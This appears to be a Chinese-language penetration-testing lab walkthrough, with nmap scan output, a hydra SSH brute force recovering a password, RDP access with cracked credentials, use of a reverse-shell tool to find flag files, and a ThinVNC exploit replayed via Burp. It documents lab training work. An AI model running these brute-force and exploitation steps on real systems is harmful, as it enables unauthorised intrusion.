PING 172.20.20.5 (172.20.20.5) 56(84) bytes of data.
From 172.16.1.1 icmp_seq=2 Destination Port Unreachable
From 172.16.1.1 icmp_seq=3 Destination Port Unreachable
From 172.16.1.1 icmp_seq=4 Destination Port Unreachable
可以知道這一台對於攻擊172.20.20.5沒有用。
打下一台:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -p135,139,445,3389 -sC -sV -O -A 172.16.19.9
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 07:15 EST
Nmap scan report for 172.16.19.9
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=FRANKLIN
| Not valid before: 2023-02-26T10:01:57
|_Not valid after: 2023-08-28T10:01:57
|_ssl-date: 2023-02-27T12:16:30+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: FRANKLIN
| NetBIOS_Domain_Name: FRANKLIN
| NetBIOS_Computer_Name: FRANKLIN
| DNS_Domain_Name: FRANKLIN
| DNS_Computer_Name: FRANKLIN
| Product_Version: 6.3.9600
|_ System_Time: 2023-02-27T12:16:25+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (94%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2012 (93%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Microsoft Windows 7 Professional (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-02-27T12:16:24
|_ start_date: 2023-02-27T10:01:53
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
|_nbstat: NetBIOS name: FRANKLIN, NetBIOS user: <unknown>, NetBIOS MAC: 00155d0136b3 (Microsoft)
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 23.11 ms 192.168.200.1
2 23.13 ms 172.16.19.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.81 seconds
剛剛那一台沒有student帳號,這一台可以試一下。
爆破出帳密,就可以用linux的遠端桌面軟體,記得不能用root執行:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.19.9 -g 90%
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=FRANKLIN
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=FRANKLIN
Issuer: CN=FRANKLIN
Valid From: Sun Feb 26 05:01:57 2023
To: Mon Aug 28 06:01:57 2023
Certificate fingerprints:
sha1: f35ca64289ebfa5cf263f1650e8dcb2bcdf72a4b
sha256: ae24948b8179650abd39670efa12814e75179755548a26eafd5a582019fed744
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
登入畫面,用剛剛爆破出的帳密登入:
桌面:
發現應用程式有安裝wireshark,打開看看:
查一下這台的網路:
從wireshark可以發現有172.20.20.4這個IP,應該可以攻擊172.20.20.5。
從上面畫面可發現,這台不斷被惡意程式問5566 port有沒有活著。
而其實桌面上已經有惡意程式,可以打開看看:
點右鍵再點紅圈:
感覺沒什麼用:
點選manager:
再點reverse shell
下圖紅圈處可打指令:
在紅圈處輸入windows指令,比如輸入dir按Enter可顯示上圖C槽目錄。上面紅圈輸入dir secret.txt /s可找secret.txt。
一樣,找到secret.txt:
Lab 3結束。
套路1:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.3.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 08:05 EST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.91% done; ETC: 08:06 (0:00:32 remaining)
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 13.56% done; ETC: 08:05 (0:00:25 remaining)
Nmap scan report for 172.16.3.128
Host is up (0.079s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 28.81 seconds
套路2:
┌──(root㉿kali)-[~]
└─# nmap -p22 -sC -sV -O -A 172.16.3.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 08:10 EST
Nmap scan report for 172.16.3.128
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ce8eb17409f0e9ac520810f2d82eb6e0 (DSA)
| 2048 a2c1d9a1e1f7302eae85cb050c3559ed (RSA)
| 256 0d8658bbfb1c322e0d70f95cf1e13eca (ECDSA)
|_ 256 b6e04ffd17be8f891da29a0cfe45a3ef (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 62.41 ms 192.168.200.1
2 13.32 ms 172.16.3.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.10 seconds
找套件弱點:
是sftp,可能不是我們要找的。接下來一樣用hydra爆破ssh帳密:
┌──(root㉿kali)-[~]
└─# hydra -l jason -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt ssh://172.16.3.128
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 08:15:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking ssh://172.16.3.128:22/
[STATUS] 103.00 tries/min, 103 tries in 00:01h, 999898 to do in 161:48h, 15 active
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 999685 to do in 158:11h, 15 active
[22][ssh] host: 172.16.3.128 login: jason password: apollo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 12 final worker threads did not complete until end.
[ERROR] 12 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 08:20:43
連上後一樣找檔案:
┌──(root㉿kali)-[~]
└─# ssh jason@172.16.3.128
The authenticity of host '172.16.3.128 (172.16.3.128)' can't be established.
ED25519 key fingerprint is SHA256:FqWIqIgmkLLMYrdOw7hB2yNfUMj9wJkvENzZLfaBrIs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.3.128' (ED25519) to the list of known hosts.
jason@172.16.3.128's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
775 packages can be updated.
483 updates are security updates.
Last login: Sat Oct 29 16:20:08 2022 from 192.168.200.15
jason@Ubuntu14:~$ uname -a
Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
jason@Ubuntu14:~$ id
uid=1001(jason) gid=1001(jason) groups=1001(jason)
jason@Ubuntu14:~$ cd /
jason@Ubuntu14:/$ find / -type f -name local.txt -print 2>/dev/null
/home/jason/local.txt
Lab 4結束。
套路1與2:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 08:17 EST
Nmap scan report for 172.16.1.112
Host is up (0.059s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 28.04 seconds
┌──(root㉿kali)-[~]
└─# nmap -p135,139,445,3389 -sC -sV -O -A 172.16.1.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 08:19 EST
Nmap scan report for 172.16.1.112
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Type: text/html
| Content-Length: 177
| Connection: Keep-Alive
| <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
| GetRequest:
| HTTP/1.1 401 Access Denied
| Content-Type: text/html
| Content-Length: 144
| Connection: Keep-Alive
| WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="n9x6bhz35UCI1zECHPflQA==", opaque="3WRbb2HCPYbAJLQID7pshR55ixhDf859iP"
|_ <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=2/27%Time=63FCADE3%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,179,"HTTP/1\.1\x20401\x20Access\x20Denied\r\nContent-Type:\x20
SF:text/html\r\nContent-Length:\x20144\r\nConnection:\x20Keep-Alive\r\nWWW
SF:-Authenticate:\x20Digest\x20realm=\"ThinVNC\",\x20qop=\"auth\",\x20nonc
SF:e=\"n9x6bhz35UCI1zECHPflQA==\",\x20opaque=\"3WRbb2HCPYbAJLQID7pshR55ixh
SF:Df859iP\"\r\n\r\n<HTML><HEAD><TITLE>401\x20Access\x20Denied</TITLE></HE
SF:AD><BODY><H1>401\x20Access\x20Denied</H1>The\x20requested\x20URL\x20\x2
SF:0requires\x20authorization\.<P></BODY></HTML>\r\n")%r(FourOhFourRequest
SF:,111,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html\r\
SF:nContent-Length:\x20177\r\nConnection:\x20Keep-Alive\r\n\r\n<HTML><HEAD
SF:><TITLE>404\x20Not\x20Found</TITLE></HEAD><BODY><H1>404\x20Not\x20Found
SF:</H1>The\x20requested\x20URL\x20nice%20ports%2C/Tri%6Eity\.txt%2ebak\x2
SF:0was\x20not\x20found\x20on\x20this\x20server\.<P></BODY></HTML>\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1607 (90%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1511 - 1607 (86%), Microsoft Windows 7 Professional (86%), Microsoft Windows 7 SP1 (85%), Tomato 1.27 - 1.28 (Linux 2.4.20) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-02-27T13:20:59
|_ start_date: 2022-10-15T07:48:25
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 61.94 ms 192.168.200.1
2 12.70 ms 172.16.1.112
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.34 seconds
發現3389 port竟然藏了一個vnc,連上去看看:
用thinvnc exploit字串google:
紅色底線處可以試著手工打打看,但應該會被瀏覽器擋下來,但可以用burp suite給repeat。
開啟burp如下圖:
剛剛輸入網址的動作被記錄下來,可以把它Send to Repeater。
送到Repeater後,可以修改剛剛送出的內容,重新再送一次。
所以修改成反白處1,符合網頁上那個POC的寫法,操作順序如下圖數字所示,最後會出現反白處3,就是POC作法成功。
再用上圖3號,再次登入看看:
成功登入:
這種遠端軟體,只要打一個點如下圖紅圈,就可以自己連自己。
這就是連線後的畫面:
可以試試呼叫系統管理員:
aaa點下圖紅線處,叫出cmd:
叫出cmd:
cmd:
輸入指令查看目前身分:
知道身分後再查這身分相關訊息:
